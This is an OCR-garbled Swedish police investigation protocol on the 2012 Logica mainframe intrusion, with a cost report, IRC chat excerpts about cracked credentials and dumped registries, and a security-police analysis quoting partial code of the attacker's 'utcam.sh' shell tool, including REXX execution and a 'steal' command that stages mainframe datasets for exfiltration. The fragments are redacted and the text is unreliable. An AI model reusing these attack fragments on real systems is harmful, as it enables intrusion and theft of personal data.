Tilläggsprotokoll. till 0201-K Beslag Målsägande vill bli underrättad om tidpunkt för huvudförhandlingen

Save this PDF as:
 WORD  PNG  TXT  JPG

Storlek: px
Starta visningen från sidan:

Download "Tilläggsprotokoll. till 0201-K81864-12. Beslag Målsägande vill bli underrättad om tidpunkt för huvudförhandlingen"

Transkript

1 Plismyndighet Stckhlms län Enhet LU/IT!T-frensisk sektin Handläggare (Prtkllförare) Kriminalinspektör Olle Wahlström Undersökningsledare Kammaråklagare Henrik Olin Plisens diarienummer 0201-K Förtursmål l Nej Ersättningsyrkanden Tilläggsprtkll till 0201-K Aklnr AM Signerat av Signerat datum Datum Beslag Målsägande vill bli underrättad m tidpunkt för huvudförhandlingen Nej Tlk krävs Misstänkt {Efternamn ch förnamn) Persnnummer Svarthlm W arg, Per Gttfrid Brtt Underrättelse m utredning enligt RB 23:18 Underrättelse Yttrande Underrättelse Underrättelsesätt, misstänkt utsänd senast slutförd Försvarare Salmnsn, Ola, förrdnad Underrättelsesätt, försvarare Resultat av underrättelse mt l Resultat av underrättelse försv Misstänkt (Efternamn ch förnamn) Persnnummer Gustafssn, Brr OlfMathias Brtt Underrättelse m utredning enligt RB 23:18 Underrättelse Yttrande Underrättelse Underrättelsesätt, misstänkt utsänd senast slutförd Försvarare Begärd, Hurtig, Björn Underrättelsesätt, försvarare Resultat av underrättelse mi l Resultat av underrättelse försv Utredningsuppgifter/Redvisningshandlingar Diarienr Uppgiftstyp Sida Tilläggsprtkll 2 Rapprt Riksplisstyrelsen 0201-K Rapprt Sammanfattning knsekvenser Riksplisstyrelsen... l PM PM Gällande kmmunikatin... 4 PM sammanfattning av innehåll i e-pst PM Analys av filen utcam.sh

2

3 Film Övrigt Film från Kambdja, D VD-skiva Persnalia Bilaga skäligen misstänkt, Gustafssn, Brr OlfMathias 21 Persnalia, Gustafssn, Brr OlfMathias 22 Bilaga skäligen misstänkt, Svarthlm W arg, Per Gttfrid 23 Persnalia, Svarthlm W arg, Per Gttfri d

4

5 Rapprt Sammanfattning knsekvenser Riksplisstyrelsen, :35 diarienr: 0201-K Plisen Riksplisstyrelsen HK/VLK Verksamhetsskyddsenheten Anders J ared Säkerhetsspecialist/ Krinsp. Rapprt Datum Diarienr (åberpas) HD- VLK 9/12 Saknr Sammanfattning särskild händelse Mrgan Händelse Den 6 mars 2012 uppdagades tecken på dataintrång hs företaget Lgica. Den 22 mars 2012 anmäldes det pågående dataintrånget till Plisen. Flera myndigheters, inkl. Riksplisstyrelsens, verksamhet baseras på den infrmatin sm finns lagrad hs företaget. Persnuppgifter inkluderat även känsliga ch skyddade persnuppgifter röjdes. Omfattning Dataintrångets mfattning var från början känd ch hanterades därför med förutsättningen att all infrmatin hs företaget var röjd. Ganska snart kunde knstateras att en str mängd infrmatin kpierats ch att åtminstne ca l O 000 spärrmarkerade persnuppgifter förts ut ur Lgicas strdatrmilj ö. Initialt var farhågrna att alla persnuppgifter sm hanteras inm Plisen ptentiellt var förändrade ch därför brukbara. Efter nggrann analys framkm dck att de persnuppgifter sm hanteras inm Plisen frtfarande var tillförlitliga. Händelsen km att beröra stra delar av Plisen ch samverkande myndigheter då skyddade persnuppgifter röjts. Ett mfattande arbete med att minimera skadrna för persner med skyddade persnuppgifter ch it-system samt att säkerställa tillförlitligheten till befmtliga uppgifter genmfördes. Aktiviteter Behvet av samrdning ch krdinering för att öka effektiviteten i arbetet var kritisk. Händelsen bedömdes falla utanför Säp:s ansvarsmråde ch RPS Verksamhetsskydd tg samrdningsansvaret för incidentarbetet Alla berörda inm RPS, skatteverket ch Krnfgdemyndigheten infrmeras m incidenten. Ett gemensamt strmöte med representanter från alla berörda myndigheter ch företag genmfördes den 23 mars för att rganisera incidentarbetet Vid mötet deltg ca 40 persner. Arbetet rganiserades i undergrupper för hantering av lika ämnesmråden. Varje myndighet, ch i vissa grupper även företag, fanns representerade med minst en persn i varje undergrupp. De följande veckrna innebar incidentarbetet i strt sett heltidsarbete för en str mängd av de invlverade persnerna. För RPS del var flera lika avdelningar starkt invlverade bl. a Rikskriminalplisen, Verksledningskansliet, Sammanfattning knsekvens RPS.dcx

6

7 Rapprt Sammanfattning knsekvenser Riksplisstyrelsen, :35 diarienr: 0201-K Riksplisstyrelsen Plisavdelningen, Plisens Verksamhetsstöd, Rikskmmunikatinscentralen, Kmmunikatinsavdelningen ch säkerhetsplisen. Händelsen bedömdes vara av så allvarlig art att Riksplischefen den 28 mars 2012 beslutade m natinell särskild händelse enligt Förrdning (1989:773) med instruktin för Riksplisstyrelsen för att samrdna plisens uppgifter ch samverka med externa myndigheter mt bakgrund av dataintrånget hs skatteverkets leverantör. Den 28 mars 2012 fattade Rikskriminalplischefen beslut m att stab skulle upprättas med anledning av den allvarliga händelsen. stabsrientering med samtliga invlverade hölls vid åtta tillfällen. Arbetet i undergrupperna hade lika fkus. Främsta inriktning initialt var att avbryta intrånget ch :fa kunskap m mfattningen. När det framgick att enskilda persners säkerhet kunde vara i fara skapades en undergrupp för att minimera riskerna, infrmera ch skydda medbrgarna. Denna grupp invlverade bl. a pliser i hela landet med kntaktansvar för skyddade persner i samarbete med skatteverket. Den 4 april avslutades den akuta fasen då intrånget hade stppats ch de medelbara knsekvenserna var kartlagda. Incidenthanteringsarbetet övergick då i en arbetsfas. Arbetsfasen pågick fram till 15 nvember 2012 då myndigheterna gemensamt beslöt att man kunnat säkra it-miljön ch stänga möjligheterna för nya liknande angrepp. Resterande åtgärder sm kvarstår bedömdes ligga inm varje myndighets eget linjearbete att hantera. Arbetet frtgår. Kstnadsberäkning Kstnadsberäkning är gjrd för RPS. Övriga myndigheter ch företags kstnader är ej inkluderade. Inga kstnader sm är kpplade till den plisiära förundersökningen är således inkluderade i den presenterade kstnadsberäkningen. Beräkningen hänför sig enbart till det arbete sm lagts ner inm RPS på att hantera incidenten ch att säkerställa att den infrmatin (relaterad till intrånget) sm Plisen använder sig av går att lita på. Kstnadsberäkningen är inte kmplett då redvisningen arbetad tid inte sammanställs på inträffade incidenter till skillnad från plisiära utredningar. Det redvisade belppen ligger således i underkant mt verklig kstnad. Kstnaden är baserad på den samma schablnkstnad sm debiteras ex. bevakning av idrttsevenemang. Schablnen är 920 kr/arbetad timma. Sammanställning av kstnader uppdelat på avdelning: Avdelning Summa RPS Verksamhetsskydd ,00 kr RPS Kmmunikatinsavd. Ingen uppgift RPS/RKP Delsumma ,00 kr RPS/PVS ,00 kr RPS Systemägare Ingen uppgift SÄPO ,00 kr RPS Stab Uppskattad ,00 kr

8

9 Rapprt Sammanfattning knsekvenser Riksplisstyrelsen, :35 diarienr: 0201-K Riksplisstyrelsen HK Ledning PVS Ledning Stab Återstående arbete Uppskattad Ttalt ,00 kr Ingen uppgift ,00 kr ,00 kr Intrångets knsekvens för RPS kan knstateras vara att det medfört en avsevärd kstnad sm kunnat användas till medbrgarnas nytta på ett betydligt bättre sätt. Tiden sm lagts ner på incidentarbetet från en str mängd persner inm RPS har försenat annat högt pririterat arbete. Anders J ar ed

10

11 diarienr: 0201-K Plisen Plismyndigheten i Stckhlms län Länskriminalplisavdelningen IT-frensiska sektinen Jakim Perssn IT-frensiker PM Datum Diarienr (åberpas vid krresp) 0201-K Gällande kmmunikatin Mathias Gustafssn, alias dirox I material sm inhämtats hs passagen. se återfanns ett antal textfiler vilka innehåller sparade chatknversatiner sm skett via IRC. Av ttalt 1967 mttagna meddelanden kmmer 679 från användaren tlt sm får antas vara Gttfrid Svarthlm W arg. Så gtt sm all chat handlar m intrånget mt Lgica. Nedan följer utdrag ur chatten: : : : : : : : : :56 <tlt> <tlt> <tlt> <tlt> <tlt> de ar sa JA VLA AGDA j såg inte at du skrev, vad var det j ag laddade ner? deras racf-db tank /etc/passwd :P well shadw h ah unerbart : : : : : : : :15 vill du ha ett par inftrgkntn :) sisadar 70k st :) japs ge mig j ag har bara 200 =) har du nå plisknn,? skulle vilja se hur dm såg ut laddar du upp dm nånstans? : : : : :23 typ 128k kntn ttalt hade krakkat 70k senast jag kllade :) fan va nice =) duktig apa : sen har jag kmpletta dumpar av bl.a. fgdens register PM Gällande kmmunikatin.dcx

12

13 PM Gällande kmmunikatin, :38 diarienr: 0201-K Plismyndigheten i Stckhlms län K :24 <tlt> :24 <tlt> <tlt> sen har jag kmpletta dumpar av bl.a. fgdens register bara fgden e 12GB haha : : : : :30 <tlt> :30 <tlt> jag vill ha derazs register ska du inte ha lite pengar fran fgden x :) jp =) av ngn anledning trr jag att det e en dalig ide. frsta ar battre maste rdna narrstans du kan dra fran bara :26 <t L t> :26 <tlt> : : :27 SPAR ligger ju inte hs inftrg/sema!lgica langre! :D daremt gr KFMs register det (REX).. du sag att jag sntt hela? jag packade upp allt idag, sitter ch krypteraqr det nu håller på att säkra det säkra på Japtppen vill du ha allt det jag har sen? vet inte m vi har lika I materialet påträffades utöver knversatinerna med Svarthlm W arg även chat med Smedlund, se utdrag nedan : :53 <S Plg,gl> :53 <sii:qtgg]> :53 <snggl> :53 <SRqggl> :53 <SDl;tgci> : : : : : : : : :54 vill du ha några kntn till inf? näätack har samma sm du redan vi sm krackat dm vettvettyvetty=) j men snacka inte så mkt m det på efnet inte krypterat här lär vara lggat =P är du inte på tnet? j krs där nej på widepenbsd =)aha, jag trdde det var jag ch anaapa sm samarbetat japps är kvar i se

14

15 PM Gällande kmmunikatin, :38 diarienr: 0201-K Plismyndigheten i Stckhlms län K Krisffer Smedlund, alias snuggle ch krs I Smedlunds datr med beslagsnummer BG påträffades två filer benämnda ut.txt ch ut2.txt. Filerna innehåller råa flkbkföringsuppgifter för Gttfrid Svarthlm W arg ch Fredrik Neij tagna från Lgicas system. I förhör kan Smedlund inte påminna sig ha sett dessa uppgifter utan menar att det pstas så mycket i IRC kanalen. Gttfrid Svarthlm W args, alias Anakata ch tlt I Svarthlm W args datr med beslagsnummer BG påträffades str mängder chatknversatiner sm skett via IRC. Det finns dck stra luckr i materialet men man ser att Svarthlm W arg de fact använder sig av användamamnet tlt ch att han uppehåller sig i IRC kanalen hack.se. Kppling till hack.se Så gtt sm all kmmunikatin, mellan Svarthlm W arg, Gustafssn ch Smedlund, har skett eller sker genm IRC kanalen hack.se. Där diskuterar man relativt öppet dataintrång ch "alla" vet vad sm pågår, är inblandade i någn del eller har överseende med det sm sker. Jakim Perssn Tel: , jakim. pers se

16

17 PM sammanfattning av innehåll i e-pst, :21 diarienr: 0201-K Plisen Bilaga Datum Plismyndigheten i Stckhlms län Länskriminalplisavdelningen IT-frensiska sektinen Diarienr (åberpas vid krresp) 0201-K l (7) Sammanfattning avepst i BG avseende bilar Bilder från Inftrg med slagningar på bilar tillhörande rättsvårdande myndigheter förekmmer i två epst meddelande. Dels skickat till fredagen den 15:e ktber :39: ch dels nsdagen den 20:e ktber :19: se nedan. Frm: T: Subject: Mathias Gustafssn bilar Sent: Fri, 15 Oct :39: Sökväg: /hme/luciddream/. thunderbird/af1 wcun. default/imapmail/ imap.ggl .cm/[gmail].sbd/sent Mail bilar [--Mime Part, Type: image/jpeg; name="avesta01.jpg", Disp: attachment; filename="avesta01.jpg", Size: 139KB --] [--Mime Part, Type: image/jpeg; name="brlnge01.jpg", Disp: attachment; filename*=utf- 8"%62%6F%72%6C%C2%84%6E%67%65%30%31 %2E%4A%50%47, Size: 169KB --] [--Mime Part, Type: image/jpeg; name="falun01.jpg", Disp: attachment; filename="falun01.jpg", Size: 160KB --] [--Mime Part, Type: image/jpeg; name="falun02.jpg", Disp: attachment; filename="falun02.jpg", Size: 190KB --] [--Mime Part, Type: image/jpeg; name="hktet_falun01.jpg", Disp: attachment; filename*o*=utf- 8''%68%C2%84%6B% 74%65% 74%5F%66%61 %6C%75%6E%30%31 %2E%4A%50; filename*1 *=%47, Size: 113KB --] [--Mime Part, Type: image/jpeg; name="hktet_hrnsand01.jpg", Disp: attachment; filename*o*= UTF- 8"%68%C2%84%6B%74%65%74%5F%68%C2%84%72%6E%C2%94%73%61%6E; filename*l *=%64%30%31 %2E%4A%50%47, Size: 108KB --] [--Mime Part, Type: image/jpeg; name="kva_gruvberget01.jpg", Disp: attachment; filename="kva_gruvbergetol.jpg", Size: 137KB --] [ --Mim e Part, Type: image/jpeg; name="kva_hall01.jpg", Disp: attachment; filename="kva_hall01.jpg", Size: 140KB --] [--Mime Part, Type: image/jpeg; name="kva_tillberga01.jpg", Disp: attachment; filename="kva_tillberga01.jpg", Size: 114KB --] [--Mime Part, Type: image/jpeg; name="kva_viskan.jpg", Disp: attachment; filename="kva_viskan.jpg", Size: 125KB --] [ --Mi me Part, Type: image/jpeg; name="kvm_vsterts.jpg", Disp: attachment; filename*=utf- 8"%68% 76%6D%5F% 76%C2%84% 73%74%65% 72%C2%86% 73%2E%4A%50%4 7, Size: 108KB --] [ --Mi me Part, Type: image/jpeg; name="ludvika01.jpg", Disp: attachment; filename="ludvika01.jpg", Size: 131KB --] [--Mime Part, Type: image/jpeg; name="malung01.jpg", Disp: attachment; filename="malung01.jpg", Size: 154KB --]

18

19 PM sammanfattning av innehåll i e-pst, :21 diarienr: 0201-K Plismyndigheten i Stckhlms län K [--Mime Part, Type: image/jpeg; name="mraol.jpg", Disp: attachment; filename="mraol.jpg", Size: 160KB --] [--Mi me Part, Type: image/jpeg; name="ngelhlmol.jpg", Disp: attachment; filename*=utf- 8"%C2%84%6E%67%65%6C%68%6F%6C%6D%30%31 %2E%4A%50%47, Size: 115KB --] [--Mi me Part, Type: image/jpeg; name="rttvik.jpg", Disp: attachment; filename*=utf- 8"%72%C2%84%74%74%76%69%6B%2E%4A%50%47, Size: 127KB --] [--Mime Part, Type: image/jpeg; name="vstersol.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84% 73%74%65% 72%C2%86% 73%30%31 %2E%4A%50%47, Size: 160KB --] [--Mime Part, Type: image/jpeg; name="vsters02.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%32%2E%4A%50%47, Size: 196KB --] [--Mi me Part, Type: image/jpeg; name="vsters03.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%33%2E%4A%50%47, Size: 199KB --] [--Mime Part, Type: image/jpeg; name="vsters04.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%34%2E%4A%50%47, Size: 194KB --] X-Mzilla-Status: 0001 X-Mzilla-Status2: Return-Path: Received: frm [ ] (h a27l.priv.bahnhf.se [ ]) by mx.ggle.cm with ESMTPS id q54sm eeh (versin=sslv3 cipher=rc4-mds); Fri, 15 Oct :39: (PDT) Message-ID: User-Agent: MIME-Versin: 1.0 Mzilla/5.0 (Xll; U; Linux i686; en-us; rv:l ) Geck/ Thunderbird/3.0.8 Cntent-Type: multipart/mixed; bundary=" " Frm: T: Subject: Mathias Gustafssn bilar Sent: Wed, 20 Oct :19: Sökväg: /hme/lucidd rea m/. thunderbird/af1 wcun. default/imapmail/ imap.ggl .cm/[gmail].sbd/sent Mail bilare [ --Mi me Part, Type: image/jpeg; name="kvm_v,.sterts.jpg", Disp: attachment; filename*=utf- 8"%6B% 76%6D%5F% 76%C2%84% 73%74%65%72 %C2%86% 73%2E%4A%50%4 7, Size: 108KB --] [--Mime Part, Type: image/jpeg; name="h,.ktet_h,.rn"sandol.jpg", Disp: attachment; filename*o*=utf- 8"%68%C2%84%6B%74%65%74%5F%68%C2%84%72%6E%C2%94%73%61%6E; filename*1 *=%64%30%31 %2E%4A%50%47, Size: 108KB --] [ --Mim e Part, Type: image/jpeg; name="h,.ktet_falunol.jpg", Dis p: attachment; filename*o* = UTF- 8''%68%C2%84%6B% 74%65% 74%5F%66%61 %6C% 75%6E%30%31 %2E%4A %50; filename*1 *=%47, Size: 113KB --] [--Mime Part, Type: image/jpeg; name="kva_tillbergaol.jpg", Disp: attachment; filename="kva_tillbergaol.jpg", Size: 114KB --] [ --Mi me Part, Type: image/jpeg; name=",.ngelhlmol.jpg", Disp: attachment; filename*=utf- 8"%C2%84%6E%67%65%6C%68%6F%6C%6D%30%31 %2E%4A%50%47, Size: llskb --] [--Mime Part, Type: image/jpeg; name="kva_viskan.jpg", Disp: attachment; filename="kva_viskan.jpg", Size: 125KB --] [--Mime Part, Type: image/jpeg; name="r,.ttvik.jpg", Disp: attachment; filename*=utf- 8"%72%C2%84%74%74%76%69%6B%2E%4A%50%47, Size: 127KB --] [--Mime Part, Type: image/jpeg; name="ludvika01.jpg", Disp: attachment; filename="ludvika01.jpg", Size: 131KB --] [ --Mim e Part, Type: image/jpeg; name="kva_gruvberget01.jpg", Dis p: attachment; filename="kva_gruvberget01.jpg", Size: 137KB --] [--Mime Part, Type: image/jpeg; name="avestaol.jpg", Disp: attachment; filename="avestaol.jpg", Size: 139KB --]

20

21 PM sammanfattning av innehåll i e-pst, :21 diarienr: 0201-K Plismyndigheten i Stckhlms län K [--Mime Part, Type: image/jpeg; name="kva_haiiol.jpg", Disp: attachment; filename="kva_haiiol.jpg", Size: 140KB --J [--Mime Part, Type: image/jpeg; name="malung01.jpg", Disp: attachment; filename="malungol.jpg", Size: 154KB --J [--Mi me Part, Type: image/jpeg; name="mraol.jpg", Disp: attachment; filename="mraol.jpg", Size: 160KB --J [--Mi me Part, Type: image/jpeg; name="v,stertsol.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%31%2E%4A%50%47, Size: 160KB --J [--Mime Part, Type: image/jpeg; name="falunol.jpg", Disp: attachment; filename="falunol.jpg", Size: 160KB --J [--Mime Part, Type: imagejjpeg; name="brl,ngeol.jpg", Disp: attachment; filename*=utf- 8"%62%6F%72%6C%C2%84%6E%67%65%30%31 %2E%4A%50%47, Size: 169KB --J [--Mime Part, Type: imagejjpeg; name="falun02.jpg", Disp: attachment; filename="falun02.jpg", Size: 190KB --J [--Mi me Part, Type: image/jpeg; name="v,sterts04.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73% 74%65% 72%C2%86% 73%30%34%2E%4A%50%47, Size: 194KB --J [--Mime Part, Type: imagejjpeg; name="v,sterts02.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%32%2E%4A%50%47, Size: 196KB --J [--Mime Part, Type: image/jpeg; name="v,sterts03.jpg", Disp: attachment; filename*=utf- 8"%76%C2%84%73%74%65%72%C2%86%73%30%33%2E%4A%50%47, Size: 199KB --J X-Mzilla-Status: 0001 X-Mzilla-Status2: Return-Path: Received: Message-ID: U ser-agent: MIM E-Versin: Cntent-Type: frm [ J (h a271.priv.bahnhf.se [ ]) by mx.ggle.cm with ESMTPS id q51sm eeh (versin=sslv3 cipher=rc4- MD5); Tue, 19 Oct :19: (PDT) <4CBE2784. > Mzilla/5.0 (Xll; U; Linux i686; en-us; rv: ) Geck/ Thunderbird/ multipart/m ix ed; bundary= " " Till båda dessa e-pst meddelanden är 20 bildfiler bifgade föreställande skärmdumpar från slagningar på inftrgs webbtjänst. Detta är samma bilder sm har påträffats i materialet inhämtat från Ubuntu One ch sm beskrivs under rubriken " Skärmdumpar plisen" i analysprtkllet för det samma. Nedan följer tre exempel ur dessa bifgade filer.

22

23 avestao l.jpg Eile dit!dew Hi try fil<marks Ils <Cf https://www5.1nftrg.se/infbi l/frameorgnr.jsp h met (/l Ol 3 3 Ol :J 00 :::: Reg /Org /Persnnr l Körkrt l Chassinr Skning Frdns innehav.. Frdnsinnehav Ägare Saluvagntfinnehav Huvudkntr l fllial Adresser :J :J cc Ol < :J :J <D ::f' Ol Nv söknmg Utskrift <D - (/l N fi!j!iiiiiimii! l POLISMYNDIGHETEN DALARNA BOX 739/NÄPO OMR. AVESTA FALUN LKF: Ägarkategri: staten... w l -"'"... l (j) Antal hämtade frdn: 11 Frdnsslag S P Antal status Antal Antal Ägerrll N iii" [ Dne /t startl Inrbil- Mzilla FirerM '\1 kva_visklln.jpg- Paint lirsm. Frdnsslag status SLÄP Beatrice- Cnversatian l FJ l i) Der Dank [Discschlac... l Cnversatian l Nielas... Ägarrll (i)' :J :: N... l :A CP... CP (j) -"'"... l N Cnversatian l Hi Way Technlgy C... l $ Windws Messenger ->.

24 r l ( ( (

25 brlngeo l.jpg ""' s: Ul Ql 3 3 Ql :J Di' Chassinr Reg /Org /Persnnr l Körkrt l Skntng F rdns innehav Frdnsinnehav saluvagnsinnehav Huvudkntr / fili l AdNsser :::+ :J :J cc Ql < :J :J CD ::r Q) Ägare Ny sökmng Utskrift POLISMYNDJGHETEN DALARNA BOX 739 /NÄPO OMR.BORLÄNGE FALUN LKF: Ägarkategri: staten CD "O l N... w l Antal hämtade frdn: 21 Frdnsslag Antal status Antal Ägarrll l Antal... (j) l SLÄP Beatrlce Cnversatian falun02. JP G Paint N Ärsm. Frdnsslag status SLÄP j l: Cnversatian l iij Dcument- WrdPad FJ- a. Ägarrll Nielas Cnversatian D.. ili'... (O' :J :: N... c:... c: (j) l... N J Ql Hi Way Technly- C... l Windws Messenger......

26 ( (

27 faluno l.jpg '(j '1J s: (/) Q) l 1 4-h-met 3 3 Q) :J öi' Reg-/Org-/Persnnr Skmng t Frdnsinnehav saluvagnsinnehav Huvudkntr l filial Adresser l Körkrt :::::: :J :J cc Q) < :J :J CD ::r Qt l Chasslnr Ny s O k n i nq Frdns innehav Ägare Utskrift CD "C (/) l POLISMYNDIGHETEN DALARNA BOX 739/NÄPO OMR. FALUN FALUN LKF: Ägarkategrl: Staten -- N... w l.j:>. l... Q) Antal hämtade frdn: 50 Frdnsslag... Antal 33 SLÄP 7 MC 6 L stbil 4 status Antal Ägarrll r-:, Antal 1 Avstäl l d Qi'... Ärsm. Frdnsslag status 2007 I tr fik 2007 I tr fik Lastbil 1971 SLÄP MC 1964 MC 1984 MC 1984 MC 1999 Lastbil SLÄP 1990 SLÄP 1972 SLÄP 2007 SLÄP SLÄP (ii' :J :: N Ägarrll... CX>... CX> Q).j:>. l... N Dne lf,tstartl Infbll- Mzllla FlrefK [jl New Message l Be trlce- Cnvers tin lj untried - Palnt l Cnversatian lli'j Dcument - WrdP d FJ- l Ni c l s - Cnversatian l HI W y Technlgy- C l - Windws Messenger... -" N

28 ( \ ( (

29 PM Analys av filen utcam.sh, :32 diarienr: 0201-K SÄKERH ETSPOLISEN Infrmatinssäkerhetsenheten PM Datum Diarienr 13 1 (7) Analys av filen utcam.sh Bakgrund Angriparen har successivt utvecklat sina attackmetder i syfte att strukturera ch förenkla sitt arbete. I beslag BG E01/Partitin 7/ återfinns en fil med namnet "utcam.sh". Nedan redvisas översiktligt innehållet i denna fil. Delar av filen har tagits brt för att undvika nödig expnering av lp-adresser, tillvägagångssätt ch detaljer i utnyttjade sårbarheter. För att öka läsbarheten av skriptet har ckså tmma rader tagits brt ch några extra radbrytningar tillkmmit. Sammanfattning Angriparen har skrivit ett verktyg för att förenkla sina attacker. Verktyget är i frm av ett så kallat shell-skript med vars hjälp man enkelt kan välja vilken server man ska angripa ch vad man vill åstadkmma med attacken. Shell-skriptet utnyttjar en av de sårbarheter sm angriparen funnit ch är avancerat ch väl strukturerat. Ett exempel på kmmand sm kan ges till skriptet är "steal". Kmmandt används till exempel då man önskar stjäla viss specificerad infrmatin på strdatrn.

30 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 14 2 (7) Analys Filen är vad man brukar benämna ett shell-skript1 Förenklat kan man beskriva ett shell-skript sm en serie kmmandn man önskar att datrn ska utföra sekventiellt. I denna analys ges en beskrivning av shell-skriptets funktin. Detta för att skildra angriparens intentin ch kapacitet. Beskrivningarna ges direkt efter utvalda kdsegment. Kdsegmenten följer ftlens struktur från början till slut ch sm tidigare nämnts har delar av kden tagits brt. Delar av kden har ckså färgmarkerats för att tydliggöra några viktiga delar. #!/bin/bash h=" IP-adress annan strdatr" Högst upp i ftlen specificerar angriparen ett antal lp-adresser. Dessa har i detta PM bytts ut mt en beskrivande text. Om det är ett #-tecken före en rad i ett shell-skript kmmer denna rad inte att läsas av skriptet. I stycket van ser vi att det är Nrdeas strdatr sm angriparen valt att angripa. Det är dck lätt gjrt att ändra servet så att man i stället angriper ett annat mål genm att flytta #-tecknet. 1 Från engelskans shell script 2 Restructured Extended Executr, prgrammeringsspråk utvecklat av IBM

31 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 15 3 (7) "Mzilla/5.0 (Windws NT 5.1; x86) AppleWebKit/ (KHTML, like Geck) Chrme/ Safari/535.19" dh=" UT" while :; d ech -n " $dh 8====D " Shell-skriptet frtsätter med att definiera ett antal variabler samt att invänta ett kmmand ch eventuellt annan data från användaren. I resterande del av shell-skriptet kmmer detta kmmand att ha lagrats i variabeln "verb". Verb kan således likställas med valt kmmand. Shell-skriptet innehåller en hel del spårutskrifter. Det är dessa man ftast ser efter kmmandt ech. ech " << $cmdline" if [ -z "$cmdline" ]; then ech " FIN" exit O f i 'ech "$cmdline" lcut -d' ' -fl' arg=' ech "$cmdline" l cut -d' ' -f2-' cmd=" "; pr=" " pst=" " tgt=" " if [ ]; then ech " : ppppp REXX ROXX" >&2 pr=" ech '/* REXX */' > /tmp/rx; ech '' >> /tmp/rx; chrnd 755 /tmp/rx; "; f i pst=" rm -f /tmp/rx "; tgt=" " cmd=" $arg" Shell-skriptet definierar här det första möjliga kmmandt "rx". Om angriparen valt att utföra just kmmandt rx är det på denna plats det bestäms vad kmmandt ska utföra. sekvensen av instruktiner delas upp i lika delar: pr, pst, tgt ch cmd. Detta för att enklare dela upp i vilken rdning kmmandna ska ske ch för att mer strukturerat sätta ihp kmmandt till en helhet i slutet av shell-skriptet. I just det här fallet önskar angriparen kunna skriva ch köra REXX2-kd på strdatrn. 2 Restructured Extended Executr, prgrammeringsspråk utvecklat av IBM

32 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 16 4 (7) if "$verb" = " l ; then ech ":ppppp REXX ROXX OUT" >&2 f i Här önskar angriparen utföra samma sak sm i exemplet van, men med den skillnaden att man förväntar sig att REXX-kmmandna prducerar någn frm av utdata sm man är intresserad av. if "$verb" = " l ; then ech ":pppp REXXOPHiLE" >&2 ech " [ $arg l " inputfile='ech "$arg" lcut -d' ' -fl' rest=' ech "$arg" l cut -d' ' -f2-' cmd=' (ech -n "PARMS='${rest}' ;" ; cat $inputfile)' pr=" ech '/* REXX */' > /tmp/rx; ech '1=\" \"; say \"k\" ; ' >> /tmp/rx; chind 755 /tmp/rx; cat /tmp/rx;" ; tgt=" " f i exit O Då kmmandt rxin anges, önskar angriparen köra REXX-kmmandn sm anges via en fil sm ckså tillhandahålls av angriparen. if [ "$verb" = " " l; then ech ":pppp REXXOPHiLE" >&2 ech " [ $arg l " inputfile='ech "$arg" lcut -d' ' -fl' rest='ech "$arg" lcut -d' ' -f2-' cmd=' (ech -n "PARMS='${rest}';" ; cat $inputfile)' fi pr=" "; tgt=" " Detta är en kmbinatin av de två tidigare beskrivna kmmandna rxut ch rxin. if [ "$verb" = " " l; then ech ":pppppp SHELL SHOCK" >&2 f i tgt=" /bin/sh" cmd=" $arg" Syftet med kmmandt sh är att köra ett kmmand/prgram i USS 3 -delen (UNIX-delen) av strdatrn. Till exempel kanske man är intresserad av hur katalgstrukturen ser ut eller vilka prcesser sm körs. 3 UNIX System Services, en kmpnent i z/os sm används i IBM:s strdatr

33 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 17 5 (7) if [ "$verb" l; then ech ":PppPPP PHILE SHOCK" >&2 ech " [ $arg ] " inputfile='ech "$arg" lcut -d' ' -fl' f i cmd=$ (cat $inputfilelsed 's/\xod//g') Kmmandt shin gör samma sak sm kmmandt sh, men med skillnaden att man läser instruktiner från en angiven fll. if [ "$verb" = " " l; then ech ":PpppPP SHYLOCK THE JEWISH THIEF STEALiNG TO gl" >&2 cmd=" rm -fr /tmp/sl; cd /tmp; mkdir /tmp/sl; mkdir /tmp/sl/$arg; cp -c > /tmp/sl/${arg}.raw.z; tgt=" " ech " [ $cmd l" f i -r \"//'$arg'\" /tmp/sl/$arg/; cat \"//'$arg'\" l Kmmandt "steal" är eventuellt självförklarande. Här har angriparen för avsikt att stjäla någt sm han själv anger. Shell-skriptet ser ckså till att kmprimera (packa ihp) infrmatinen sm angriparen har valt att stjäla, innan den läggs i en katalg på strdatrn sm är möjlig för angriparen att kmma åt.

34 PM Analys av filen utcam.sh, :32 diarienr: 0201-K säkerhetsplisen PM 18 6 (7) if [ "$verb" = 1 1 ] ; then 4096\"; e eh " : PppPPp VOLUME GOES TO 11" >&2 pr=" ech 1/* REXX */1 > /tmp/rx; ech 1address syscall \"read O tgt=" Il s cmd=" ${cmd}address ts \"allcate ddname (sysprint) sysut\"; address ts \"allcate ddname (sysin) dummy\" ; " fr vl in $arg ; d cmd=" ${cmd}address ts \"allcate dsname (1FORMAT4.DSCB1) DDNAME (SYSLIB) SHR UNIT (3390) VOLUME (${vl}) KEYLEN (44) DSORG (DA) EROPT (ACC)\" ; " cmd=" ${cmd}address ts \"TSOEXEC CALL * \" ; address ts \"REPRO INFILE (SYSLIB) OUTFILE (utdd)\"; " dn e f i ech " [ $cmd ] " Det är en någt mer avancerat peratin sm kmmandt vl utför. Shell-skriptet använder sig utav AMASPZAP, ett prgram på strdatrn sm har många användningsmråden. I detta fall trr vi att angriparen skapar sig en förteckning över tillgängliga dataset på en specifik vlym i strdatrn. if [ "$verb" = " " ] ; then ech ":PppPP TSlOw SHOCK" >&2 cmd=' ech "$arg" 1 sed 1 s/; /\n/g 1 ' fi På samma sätt sm angriparen kan köra ett kmmand/prgram i USS-delen kan han med hjälp av ts-kmmandt välja att köra ett kmmand/prgram mt MVS-delen istället. Härifrån kan man till exempel starta ett batch-jb, köra kmmandn mt RACF eller 